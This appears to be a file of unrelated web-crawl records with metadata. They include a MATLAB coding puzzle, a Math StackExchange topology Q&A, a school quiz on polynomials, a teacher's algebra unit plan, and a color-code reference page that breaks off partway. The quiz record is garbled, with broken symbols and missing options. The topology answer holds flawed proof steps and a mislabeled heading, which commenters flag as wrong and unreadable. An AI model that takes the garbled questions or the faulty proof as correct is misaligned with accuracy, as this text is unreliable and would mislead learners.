[ "Cody\n\n# Problem 2063. A matrix of extroverts\n\nNow that the introverts have had their script, the extroverts spoke up (naturally!) and demanded one as well. You will be given a matrix. Write a MATLAB script to output a new matrix consisting of the average of all four terms that are next to each other.\n\n``` 8 1 6\n3 5 7\n4 9 2```\n\n```4.2500 4.7500\n5.2500 5.7500\n```\n\nThe top left term (4.25) is the average of [8 1 ; 3 5]. The bottom left term is the average of [3 5 ; 4 9], and so on. You can assume that the size of each of these matrices will be at least 2x2. Good luck!\n\n### Solution Stats\n\n78.32% Correct | 21.68% Incorrect\nLast Solution submitted on May 07, 2020" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90076554,"math_prob":0.92950934,"size":684,"snap":"2020-24-2020-29","text_gpt3_token_len":218,"char_repetition_ratio":0.12352941,"word_repetition_ratio":0.0,"special_character_ratio":0.34795323,"punctuation_ratio":0.119760476,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9559409,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-25T02:14:25Z\",\"WARC-Record-ID\":\"<urn:uuid:f12c14ca-c2cb-4aa8-9de7-ab5fb810c2fa>\",\"Content-Length\":\"98728\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:93fc6d76-d8dc-462e-9c29-1bfd32421ec2>\",\"WARC-Concurrent-To\":\"<urn:uuid:b890e15e-8159-4689-8bf4-edd2b1a6c93e>\",\"WARC-IP-Address\":\"23.50.228.199\",\"WARC-Target-URI\":\"https://fr.mathworks.com/matlabcentral/cody/problems/2063-a-matrix-of-extroverts\",\"WARC-Payload-Digest\":\"sha1:2OPWYLIKKDFCWYL5F6MPFGZ6DQYM4DNE\",\"WARC-Block-Digest\":\"sha1:XARFIQP7LLAYZJDDOI3SORGQQGDKURAA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347387155.10_warc_CC-MAIN-20200525001747-20200525031747-00492.warc.gz\"}"}
https://math.stackexchange.com/questions/842801/topology-opens-vs-neighborhoods?noredirect=1
[ "# Topology: Opens vs Neighborhoods\n\nDisclaimer: This thread is meant informative and therefore written in Q&A style. The problems are highlighted in bold face.\n\nThe axiomatization of topology can be done in various ways all of them having their own advantage. Here I would like to investigate two of them specifically.\n\nThere's the one by open sets usually given: $$\\bullet \\#I<\\infty:\\quad A_i\\in\\mathcal{T}\\implies \\bigcap_{i\\in I}A\\in\\mathcal{T}\\\\ \\bullet \\#I\\leq\\infty:\\quad A_i\\in\\mathcal{T}\\implies\\bigcup_{i\\in I}A_i\\in\\mathcal{T}$$ and the one by neighborhoods introduced by Felix Hausdorff: $$\\bullet A\\subseteq B:\\quad A\\in\\mathcal{N}(x)\\implies B\\in\\mathcal{N}(x)\\\\ \\bullet A,B\\in\\mathcal{N}(x)\\implies A\\cap B\\in\\mathcal{N}(x)\\\\ \\bullet \\forall x\\in X:\\quad\\mathcal{N}(x)\\neq\\{\\}\\\\ \\bullet A\\in\\mathcal{N}(x)\\implies x\\in A\\\\ \\bullet A\\in\\mathcal{N}(x)\\implies\\exists C_0\\in\\mathcal{N}:\\quad A\\in\\mathcal{N}(c)\\text{ for all }c\\in C_0(x)$$ Prove that any family of open sets give rise to a neighborhood system via: $$A\\in\\mathcal{N_T}(x):\\iff\\exists U_0\\in\\mathcal{T}:\\quad x\\in U_0\\subseteq A\\quad$$ and that any neighborhood system gives rise to a family of open sets via: $$A\\in\\mathcal{T_N}:\\iff\\forall a\\in A:\\quad A\\in\\mathcal{N}(a)$$ Moreover prove that their equivalent in the sense: $$\\mathcal{T}\\mapsto\\mathcal{N_T}\\mapsto\\mathcal{T}\\text{ and }\\mathcal{N}\\mapsto\\mathcal{T_N}\\mapsto\\mathcal{N}$$ (Note that both must be checked in order to ensure injectivity and surjectivity.)\n\nSo we can switch back and forth between both descriptions for topology. Here are two situations where this is exploited:\n\na. The interior is defined via neighborhoods: $$A^\\circ:=\\{z:A\\in\\mathcal{N}(z)\\}$$ It is contained and open (see Topology: Interior): $$A^\\circ\\subseteq A\\text{ and }A^\\circ\\in\\mathcal{N}(z)\\text{ for all }z\\in A^\\circ$$ Therefore neighborhoods have nonempty interior: $$A^\\circ=\\bigcup_{A\\supseteq U\\in\\mathcal{T}}U$$ b. Continuity is defined via neighborhoods: $$N\\in\\mathcal{N}(f(x))\\implies f^{-1}N\\in\\mathcal{N}(x)$$ Thus in locally convex spaces topology is entailed fully in any point: $$N\\in\\mathcal{N}(x)\\iff N+a\\in\\mathcal{N}(x+a)$$\n\nSo while open sets reflect general aspects of topology correlations between space itself and topology become lucid via neighborhoods.\n\n• What is your question? – Spencer Jun 22 '14 at 21:55\n• The question was meant as: What is the proof? (See text parts in bold face.) – C-Star-W-Star Jun 22 '14 at 22:08\n• Question still unclear? – C-Star-W-Star Jun 23 '14 at 1:48\n• Let's suppose the Question is to show the equivalence of those two definitions of topological spaces. The verification can be broken down into a number of parts. You should attempt these, and ask about a specific point where you need assistance. – hardmath Jun 23 '14 at 2:35\n• No sorry, that vote was cast before your response. I've cast a reopen vote now that you have clarified it. – Spencer Jun 23 '14 at 2:35\n\nFor better reading I left out the details...\n\nAny family of open sets gives rise to a neighborhood system since: $$\\bullet\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T}\\right)\\\\\\implies\\left(U_0\\subseteq B\\quad x\\in U_0\\in\\mathcal{T}\\right)\\implies\\left(B\\in\\mathcal{N_T}(x)\\right)\\quad A\\subseteq B\\\\ \\bullet\\left(A,B\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_A\\subseteq A,U_B\\subseteq B\\quad x\\in U_A,U_B\\in\\mathcal{T}\\right)\\\\\\implies\\left(U_A\\cap U_B\\subseteq A\\cap B\\quad x\\in U_A\\cap U_B\\in\\mathcal{T}\\right)\\implies\\left(A\\cap B\\in\\mathcal{N_T}(x)\\right)\\\\ \\bullet\\left(X\\in\\mathcal{T}:\\quad x\\in X\\subseteq X\\right)\\implies\\left(X\\in\\mathcal{N_T}(x)\\right)\\\\ \\bullet\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T}\\right)\\implies\\left(x\\in U_0\\subseteq A\\right)\\\\ \\bullet\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T}\\right)\\\\\\implies\\left(U_0\\subseteq A,U_0\\subseteq U_0\\quad u,x\\in U_0\\in\\mathcal{T}\\right)\\implies\\left(A\\in\\mathcal{N}(u)\\quad u\\in U_0\\in\\mathcal{N_T}(x)\\right)$$\n\nAny family of open sets gives rise to a neighborhood system since: $$\\left(A,B\\in\\mathcal{T_N}\\right)\\implies\\left(A\\in\\mathcal{N}(a),B\\in\\mathcal{N}(b)\\quad a\\in A,b\\in B\\right)\\\\\\implies\\left(A\\cap B\\in\\mathcal{N}(c)\\quad c\\in A\\cap B\\right)\\implies\\left(A\\cap B\\in\\mathcal{T_N}\\right)\\\\ \\left(A_i\\in\\mathcal{T_N}\\right)\\implies\\left(A_i\\in\\mathcal{N}(a_i)\\quad a_i\\in A_i\\right)\\\\\\implies\\left(\\bigcup_{i\\in I}A_i\\in\\mathcal{N}(c)\\quad c\\in\\bigcup_{i\\in I}A_i\\right)\\implies\\left(\\bigcup_{i\\in I}A_i\\in\\mathcal{T_N}\\right)\\\\ \\left(\\varnothing\\in\\mathcal{N}(x)\\quad x\\in\\varnothing\\right)\\implies\\left(\\varnothing\\in\\mathcal{T_N}\\right)\\\\ \\left(\\mathcal{N}(x)\\neq\\{\\}\\quad x\\in X\\right)\\implies\\left(X\\in\\mathcal{N}(x)\\quad x\\in X\\right)\\implies\\left(X\\in\\mathcal{T_N}\\right)$$\n\nNot that the interior is contained and open: $$A^\\circ\\subseteq A\\text{ and }A^\\circ\\in\\mathcal{N}(z)\\quad z\\in A^\\circ$$ (Its precise definition, statement and proof can be found in Topology: Interior.)\n\nMoreover their equivalent since: $$\\left(A\\in\\mathcal{N_T}(x)\\right)\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{T_N}\\right)\\\\\\implies\\left(U_0\\subseteq A\\quad x\\in U_0\\in\\mathcal{N}(u)\\quad u\\in U_0\\right)\\implies\\left(U_0\\subseteq A\\quad U_0\\in\\mathcal{N}(x)\\right)\\implies\\left(A\\in\\mathcal{N}(x)\\right)\\\\ \\left(A\\in\\mathcal{N}(x)\\right)\\implies\\left(A^\\circ\\subseteq A\\quad x\\in A^\\circ\\in\\mathcal{N}(z)\\quad z\\in A^\\circ\\right)\\\\\\implies\\left(A^\\circ\\subseteq A\\quad x\\in A^\\circ\\in\\mathcal{T_N}\\right)\\implies\\left(A\\in\\mathcal{N_T}(x)\\right)$$ $$\\left(A\\in\\mathcal{T_N}\\right)\\implies\\left(A\\in\\mathcal{N_T}(a)\\quad a\\in A\\right)\\\\\\implies\\left(U_a\\subseteq A\\quad a\\in U_a\\in\\mathcal{T}\\quad a\\in A\\right)\\implies\\left(A=\\bigcup_{a\\in A}U_a\\in\\mathcal{T}\\right)\\\\ \\left(A\\in\\mathcal{T}\\right)\\implies\\left(A\\subseteq A\\quad a\\in A\\in\\mathcal{T}\\quad a\\in A\\right)\\implies\\left(A\\in\\mathcal{N_T}(a)\\quad a\\in A\\right)\\implies\\left(A\\in\\mathcal{T_N}\\right)$$\n\n• @Downvoter: Could you please explain your concern! – C-Star-W-Star Jun 22 '14 at 20:04\n• I did not downvote yet but: 1. Proofs written as long successions of implications are unreadable by humans without great efforts. 2. Already the first implication is wrong as written (what is $U_0$?). – Did Jun 23 '14 at 5:26\n• You're right - will think about changing my style for the future. Thx for the hint!! – C-Star-W-Star Jun 23 '14 at 11:42\n• In my writing whenever a variable appears only on one side of an implication, then: no index means for all of these while an index zero means there exists this one. Is this what you meant or did you mean something else? – C-Star-W-Star Jun 23 '14 at 11:52\n• A consequence of this idiosyncratic typographical convention is that your post is unreadable. – Did Jun 23 '14 at 12:20" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.76423097,"math_prob":0.99972504,"size":2261,"snap":"2019-51-2020-05","text_gpt3_token_len":736,"char_repetition_ratio":0.20779796,"word_repetition_ratio":0.0,"special_character_ratio":0.26934984,"punctuation_ratio":0.075555556,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999168,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-25T11:22:26Z\",\"WARC-Record-ID\":\"<urn:uuid:ad5cf92e-22ea-4e00-bfa8-ef0916330efa>\",\"Content-Length\":\"153198\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:61106b41-6a9a-436d-9d0c-77fa4cb3784e>\",\"WARC-Concurrent-To\":\"<urn:uuid:82b92aac-d358-4660-9999-86e4c1fc9d29>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/842801/topology-opens-vs-neighborhoods?noredirect=1\",\"WARC-Payload-Digest\":\"sha1:IT5UQCOOTWUTMAJPWE6FA6RZWZW7WMWV\",\"WARC-Block-Digest\":\"sha1:PDOZCD2RQ5JAWPJGSDB2X4ZCBWIIW5RU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251672440.80_warc_CC-MAIN-20200125101544-20200125130544-00444.warc.gz\"}"}
https://schoollearningcommons.info/question/ul-10-questions-of-1-mark-each-section-b-consist-of-6-questions-of-4-marks-each-in-which-you-hav-19836905-66/
[ "## UL 10 questions of 1 mark each. Section-B consist of 6 questions of 4 marks each in which you have to attemp Section-A Multip\n\nQuestion\n\nUL 10 questions of 1 mark each.\nSection-B consist of 6 questions of 4 marks each in which you have to attemp\nSection-A\nMultiple Choice Questions (MCQs)\nIf one zero of a quadratic polynomial x2 + 3x + k is 2, then the value of k=\na. 10\nb. – 10\nC. 5\nd. – 5\n– If the product of zeroes of the polynomials p(x)= ax3 – 6.x2 + 11x – 6 is 4, then a =\nb.\nc.\nd. – 2\n3\nIf the discriminant of the equation 6×2 – bx + 2 = 0 is 1, then the value of b is\na. 7\nb. 7\nC. +7\nd. #vi\nar? + bx + c = 0, a > 0, b=0&c> 0 has​\n\nin progress 0\n1 month 2021-08-17T14:13:33+00:00 1 Answer 0 views 0\n\n1.", null, "" ]
[ null, "https://schoollearningcommons.info/wp-content/litespeed/avatar/23494c9101089ad44ae88ce9d2f56aac.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7274662,"math_prob":0.998527,"size":782,"snap":"2021-31-2021-39","text_gpt3_token_len":309,"char_repetition_ratio":0.13239075,"word_repetition_ratio":0.22485207,"special_character_ratio":0.42455244,"punctuation_ratio":0.13432837,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9975794,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-20T08:01:57Z\",\"WARC-Record-ID\":\"<urn:uuid:b27912e8-c3e2-4efb-8461-0b901afc54b6>\",\"Content-Length\":\"68175\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1c9f6075-3f2f-4e9b-9ed8-f2a0333d1233>\",\"WARC-Concurrent-To\":\"<urn:uuid:ff2cfc50-f8ee-4d95-a3ca-35aeb82a0bce>\",\"WARC-IP-Address\":\"172.96.186.144\",\"WARC-Target-URI\":\"https://schoollearningcommons.info/question/ul-10-questions-of-1-mark-each-section-b-consist-of-6-questions-of-4-marks-each-in-which-you-hav-19836905-66/\",\"WARC-Payload-Digest\":\"sha1:5QOAB6EAFQMTWJFCAM77SVQJXMYNZZWI\",\"WARC-Block-Digest\":\"sha1:ID6W4KYEUAGP4NWJ6JWQTX2QNGFARJIJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057033.33_warc_CC-MAIN-20210920070754-20210920100754-00141.warc.gz\"}"}
https://educatorpages.com/site/njohnston01/pages/49282
[ "", null, "# SBUS Page\n\n### Standards Based Unit of Study Template (provided via LiveText)\n\nUnit Planning Template Teacher(s)       __Natalie Johnston____________________________________________________________________________________\n\nUnitTopic/Focus:_Algebra: Linear Equations and Functions_________________________________________________________________ Integration with other content areas (if applicable)________________________________________________________  Estimated time for implementation:____three weeks_________________________________________________________________\nProgram of Studies: UnderstandingsProgram of Studies: Skills and Concepts Related Core Content for Assessment\nMA-8-AT-U-1Students will understand that patterns, relations and functions are tools that help explain or predict real-world phenomena. MA-8-AT-U-2Students will understand that numerical patterns can be written as rules that generate the pattern. MA-8-AT-S-PRF1Students will recognize, create and extend patterns (generalize the pattern by giving the rule for the nth term and explain the generalization).MA-08-5.1.1Students will use variables to describe numerical patterns based on arithmetic sequences in real-world and mathematical problems (e.g., ƒ(Ν) = 2Ν+3).\nMA-8-AT-U-3Students will understand that algebra represents mathematical situations and structures for analysis and problem solving.MA-8-AT-S-VEO1Students will apply order of operations to evaluate and simplify algebraic expressions.\n\n## Students will given a formula, substitute appropriate elements from a real-world or mathematical situation.\n\n##### MA-8-AT-S-EI1\nStudents will use multiple representations to model and solve one- and two-variable linear equations.\n\n## MA-8-AT-S-EI2\n\nStudents will solve problems using formulas MA-8-AT-S-EI3Students will investigate linear inequalities using a variety of methods and representations.\nMA-08-5.2.1Students will evaluate and simplify algebraic expressions applying the order of operations.\n\n### DOK 2\n\nMA-08-5.2.2Students will describe, define and provide examples of variables and expressions with a missing value based on real-world and mathematical problems. MA-08-5.3.1Students will model and solve single variable, first-degree real-world and mathematical problems (e.g., 5x + 2 =x + 22, x – 4 < -60).\n\n### DOK 2\n\nMA-8-AT-U-4Students will understand that real-world situations can be represented using mathematical models to analyze quantitativerelationships.MA-8-AT-S-VEO3Students will describe, define and provide examples of variables and expressions with a missing value based on real-world and/or mathematical situations. MA-8-AT-S-EI4Students will model and solve real-world problems with one- or two-step equations or inequalities (e.g., 4x + 2 = 22, x – 4 < -60).MA-08-5.1.2Students will represent, analyze and generalize simple first and second degree relationships using tables, graphs, words and algebraic notations, and will apply the relationships to solve real-world and mathematical problems.\n\n### DOK 2\n\nMA-8-AT-U-5Students will understand that functions are used to analyze change in various contexts and model real-world phenomena.MA-8-AT-S-PR3Students will organize input-output coordinate pairs into tables, plot points in all four quadrants of a coordinate (Cartesian) system/grid and interpret resulting patterns or trends using technology as appropriate. MA-8-AT-S-PRF5Students will graph linear functions in a four quadrant (Cartesian) system/grid and interpret the results, using technology as appropriate. MA-8-AT-S-PRF6Students will explain how change in the input affects change in the output (e.g., in d = rt, increasing the time (t) increases the distance (d)).MA-08-5.1.5Students will explain how the change in one variable affects the change in another variable (e.g., if rate remains constant, an increase in time results in an increase in distance).\n\n### DOK 2\n\nMA-8-AT-U-6Students will understand that functions can be written in words, in a symbolic sentence or in a table.MA-8-AT-S-PRF2Students will represent, interpret and describe linear and simple quadratic functional relationships (input/output) through tables, graphs and symbolic rules.\n\n## MA-8-AT-S-PRF4\n\nStudents will interpret and explain relationships between tables, graphs, verbal rules and equations, using technology as appropriate.\n\nInterdisciplinary, Meaningful and Authentic Connections (e.g., how do the national, state, and local standards manifest within this unit and in the child’s life, what’s the “Big Idea,” why do students need to know this material):\n The students ability to analyze data and represent the data in various forms then apply these skills to real world situations. Algebraic concepts are used in the decision making process. The Algebraic thinking skills in this unit are also the foundation to future Math skills that are needed to succeed in continued education.\nContext (Unit Organizer): A narrative thatStudents will gain a foundation in Algebraic thinking that will allow them to solve real world problems and be successful in future academic efforts. This foundation will be built by first activating prior knowledge using the “What do I know? What do I want to learn” technique then developing new skills. Students will participate in hand on activities that will engage them will teaching them the skills and concepts. The real world application of Algebra will be primary in instruction to help students develop connections with material. Essential Questions (1 Essential Question supported by 3-5 Guided Questions            that guides lesson planning/focus and demonstrate):·         How do I create an algebraic expression from a real world word problem?·         How can I represent an equation (model, table, graph)?·         How do I solve addition and subtraction algebraic equations?·         How do I solve multiplication and division algebraic equations?·         How can I find the slope of a line? Culminating Activity/Assessment, A product or performance that:\n• Formative Assessments are done daily in the form of exit slips and teacher observation\n• Periodic Summative Assessment with Quizzes, mid unit exam, and Unit End Exam\n• Assessment is performed of each skill set before making the decision to proceed or add additional instruction class will only proceed if two thirds of class are proficient will the skill set\n·         Variety of instructional techniques including teacher lead, pair, cooperative groups, and individual  Resources / Technology:\n• Textbook\n• Smartboard\n• Powerpoint\n• Internet\n• Algebra Blocks\n• Spaghetti\nOutline of Daily Plans Day      Daily Objective\n\n1.       Learning Objective: Mathematics: Applications and Concepts 2004 4-1 -Students will be able to write verbal phrases as simple Algebraic expressions and equations.\n\n-Warm-Up: Pretest\n\n-Unit Introduction-Mathematics: Applications and Concepts 2004 4-1\n\n-Guided Practice\n\n-Exit Slip:  What do I Know? What Do I Want to Know?\n\n2.       Learning Objective: Mathematics: Applications and Concepts 2004 4-2a-Students will solve equations using models.\n\n-Warm-Up: Sponge Practice Problems from 4-1\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-2a\n\n-Use Algebra blocks to create models\n\n-Exit Slip:  Draw a model to solve an equation\n\n3.       Learning Objective: Mathematics: Applications and Concepts 2004 4-2-Students will solve addition and subtraction equations.\n\n-Warm-Up: Sponge Practice Problems from 4-2a\n\n-Introduction-Mathematics: Applications and Concepts 2004 4-2\n\n-Exit Slip:  Students will have a practice problem from 4-1 and 4-2a\n\n4.       Learning Objective: Mathematics: Applications and Concepts 2004 4-3-Students will solve multiplication equations.\n\n-Warm-Up: Sponge Practice Problems on 4-2\n\n- Clicker Quiz on Smartboard adding and subtracting Algebraic equations\n\n-Introduction-Mathematics: Applications and Concepts 2004 4-3\n\n-Teacher modeling and Guided Practice\n\n5.       Learning Objective: Additional guided practice to help students become proficient solving multiplication equations.\n\n-Warm-Up: Review for Mid Unit Assessment\n\n-Mid Unit Assessment (Summative Assessment)\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4\n\n6.       Learning Objective: Mathematics: Applications and Concepts 2004 4-4a-Students will explore the problem solving strategy “work backward”.\n\n-Warm-Up: Review Mid Unit Assessment\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4a\n\n-Guided Practice (Formative Assessment) and Pair Share\n\n7.       Learning Objective: Mathematics: Applications and Concepts 2004 4-4-Students will solve two step equations.\n\n-Warm-Up: Sponge Practice Problems from 4-4a\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4\n\n-Cooperative Group Activity with real world problems\n\n-Exit Slip:  What do I Know? What Do I Want to Know?\n\n*Detailed Lesson Plan Included\n\n8.       Learning Objective: Mathematics: Applications and Concepts 2004 4-4-Additional guided practice to help students become proficient solving two step equations.\n\n-Warm-Up: Practice problems from 4-4a and 4-4\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-4\n\n-Guided Practice (Formative Assessment) and Pair Share\n\n-Exit Slip:  What do I Know? What Do I Want to Know?\n\n9.       Learning Objective: Mathematics: Applications and Concepts 2004 4-5- Students will graph functions on a scatter plot.\n\n-Warm-Up: Review Areas for growth from Exit Slip\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-5\n\n-Guided Practice (Formative Assessment) and Pair Share with students using spaghetti to show line of best fit\n\n10.   Learning Objective: Applications and Concepts 2004 4-6- Students will graph a linear equation.\n\n-Warm-Up: Review from 4-4 and 4-5\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-6\n\n11.   Learning Objective: Applications and Concepts 2004 4-7- Students will find the slope of a line.\n\n-Warm-Up: Practice Problems form 4-6\n\n- Introduction-Mathematics: Applications and Concepts 2004 4-7\n\n-Review for End of Unit Summative Assessment\n\n12.End of Unit Summative Assessment\n\nReflections and Connections to Kentucky's Teacher Standards:\n\nNatalie Johnston\n\nEDUC 666\n\nFall 2009\n\nSBUS Reflection\n\nUpon review of my videotaped lesson I have identified areas of strength and areas for growth for myself within the Kentucky Teacher Standards. The standards give an excellent framework for my development as an educator. I have developed this reflection through personal reflection and collaboration with my host teacher.\n\nMy areas for growth are primarily with the use of technology (6.1) and in creating a positive learning environment (3.2). When I developed my lesson plan I created a power point presentation to assist in instruction. However, I failed to communicate with my host teacher that I was using Windows XP. The technology in the classroom was only compatible with power points that are in windows 1993 format. I was unable to use my power point and instead did the lesson without the use of technology. This would have been a very simple problem to fix had I know at the time I created the power point. This situation also reflects a need to develop better collaborative efforts (8.3). My other primary area for growth is in creating a positive learning environment. Classroom management is a crucial factor to being a successful teacher. During my lesson there were times that the host teacher had to assist me with controlling the class. Once I have my own class there will not be a veteran teacher there to assist me in similar situations. When we spoke after the lesson she shared advice as to how I could better facilitate classroom management such as setting the expected standard for the noise level prior to the beginning of collaborative learning activities.\n\nMy strengths include designing lessons that are relevant (2.2) and engaging to students (4.1). During my observation in the classroom prior to teaching my lesson I identified the material that was going to be covered and developed a lesson that was going to support the material. My host teacher was very pleased with my ability to create real world applications of the material. By doing so I was able to engage the students and facilitate learning. After the lesson my host teacher, Ms.Reilly, asked the students if they enjoyed the lesson and they answered with a resounding “YES”. That was one of the most gratifying moments of my very short teaching career. I know that there are going to be times when the students would prefer not to be in class (particularly Math class) but, anytime that I can illicit that type of response from a group of students I believe that we will all have grown from the experience.\n\nReflecting and evaluating upon our teaching is standard 7.2. I have found this process to be very valuable for me as a developing teacher. After the initial teaching of the lesson I took time to meet with my host teacher and reflect upon the lesson. She had excellent advice and encouragement that I was then able to use in my subsequent implementation of the lesson in the following class period. Writing this personal reflection has also been helpful in allowing me to review the teacher standards and use them as a tool for professional development." ]
[ null, "https://www.facebook.com/tr", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89256513,"math_prob":0.5800935,"size":11728,"snap":"2020-45-2020-50","text_gpt3_token_len":2572,"char_repetition_ratio":0.18645513,"word_repetition_ratio":0.079635255,"special_character_ratio":0.23601638,"punctuation_ratio":0.0979713,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95221996,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T04:58:36Z\",\"WARC-Record-ID\":\"<urn:uuid:32d90840-6103-4dd4-8c91-9d9d9578ce79>\",\"Content-Length\":\"61549\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3a197b92-6f22-4a1f-9f59-38e3bb8f8ed2>\",\"WARC-Concurrent-To\":\"<urn:uuid:6fe4b757-0fbb-485d-8dba-1340609e600f>\",\"WARC-IP-Address\":\"23.96.2.14\",\"WARC-Target-URI\":\"https://educatorpages.com/site/njohnston01/pages/49282\",\"WARC-Payload-Digest\":\"sha1:E6T7QPYE3OMRPRXN5JXTV5GCZ3JVHWLM\",\"WARC-Block-Digest\":\"sha1:J2R7UHLA2IMTQKQNNDPMYQX2LHAGLMTP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107890273.42_warc_CC-MAIN-20201026031408-20201026061408-00650.warc.gz\"}"}
https://www.colorhexa.com/ce001c
[ "# #ce001c Color Information\n\nIn a RGB color space, hex #ce001c is composed of 80.8% red, 0% green and 11% blue. Whereas in a CMYK color space, it is composed of 0% cyan, 100% magenta, 86.4% yellow and 19.2% black. It has a hue angle of 351.8 degrees, a saturation of 100% and a lightness of 40.4%. #ce001c color hex could be obtained by blending #ff0038 with #9d0000. Closest websafe color is: #cc0033.\n\n• R 81\n• G 0\n• B 11\nRGB color chart\n• C 0\n• M 100\n• Y 86\n• K 19\nCMYK color chart\n\n#ce001c color description : Strong red.\n\n# #ce001c Color Conversion\n\nThe hexadecimal color #ce001c has RGB values of R:206, G:0, B:28 and CMYK values of C:0, M:1, Y:0.86, K:0.19. Its decimal value is 13500444.\n\nHex triplet RGB Decimal ce001c `#ce001c` 206, 0, 28 `rgb(206,0,28)` 80.8, 0, 11 `rgb(80.8%,0%,11%)` 0, 100, 86, 19 351.8°, 100, 40.4 `hsl(351.8,100%,40.4%)` 351.8°, 100, 80.8 cc0033 `#cc0033`\nCIE-LAB 43.077, 68.533, 46.595 25.665, 13.209, 2.297 0.623, 0.321, 13.209 43.077, 82.872, 34.211 43.077, 138.411, 26.315 36.344, 62.446, 21.694 11001110, 00000000, 00011100\n\n# Color Schemes with #ce001c\n\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #00ceb2\n``#00ceb2` `rgb(0,206,178)``\nComplementary Color\n• #ce0083\n``#ce0083` `rgb(206,0,131)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #ce4b00\n``#ce4b00` `rgb(206,75,0)``\nAnalogous Color\n• #0083ce\n``#0083ce` `rgb(0,131,206)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #00ce4b\n``#00ce4b` `rgb(0,206,75)``\nSplit Complementary Color\n• #001cce\n``#001cce` `rgb(0,28,206)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #1cce00\n``#1cce00` `rgb(28,206,0)``\n• #b200ce\n``#b200ce` `rgb(178,0,206)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #1cce00\n``#1cce00` `rgb(28,206,0)``\n• #00ceb2\n``#00ceb2` `rgb(0,206,178)``\n• #820012\n``#820012` `rgb(130,0,18)``\n• #9b0015\n``#9b0015` `rgb(155,0,21)``\n• #b50019\n``#b50019` `rgb(181,0,25)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #e8001f\n``#e8001f` `rgb(232,0,31)``\n• #ff0224\n``#ff0224` `rgb(255,2,36)``\n• #ff1c3a\n``#ff1c3a` `rgb(255,28,58)``\nMonochromatic Color\n\n# Alternatives to #ce001c\n\nBelow, you can see some colors close to #ce001c. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #ce0050\n``#ce0050` `rgb(206,0,80)``\n• #ce003e\n``#ce003e` `rgb(206,0,62)``\n• #ce002d\n``#ce002d` `rgb(206,0,45)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #ce000b\n``#ce000b` `rgb(206,0,11)``\n• #ce0600\n``#ce0600` `rgb(206,6,0)``\n• #ce1800\n``#ce1800` `rgb(206,24,0)``\nSimilar Colors\n\n# #ce001c Preview\n\nThis text has a font color of #ce001c.\n\n``<span style=\"color:#ce001c;\">Text here</span>``\n#ce001c background color\n\nThis paragraph has a background color of #ce001c.\n\n``<p style=\"background-color:#ce001c;\">Content here</p>``\n#ce001c border color\n\nThis element has a border color of #ce001c.\n\n``<div style=\"border:1px solid #ce001c;\">Content here</div>``\nCSS codes\n``.text {color:#ce001c;}``\n``.background {background-color:#ce001c;}``\n``.border {border:1px solid #ce001c;}``\n\n# Shades and Tints of #ce001c\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #0a0001 is the darkest color, while #fff5f7 is the lightest one.\n\n• #0a0001\n``#0a0001` `rgb(10,0,1)``\n• #1d0004\n``#1d0004` `rgb(29,0,4)``\n• #310007\n``#310007` `rgb(49,0,7)``\n• #450009\n``#450009` `rgb(69,0,9)``\n• #58000c\n``#58000c` 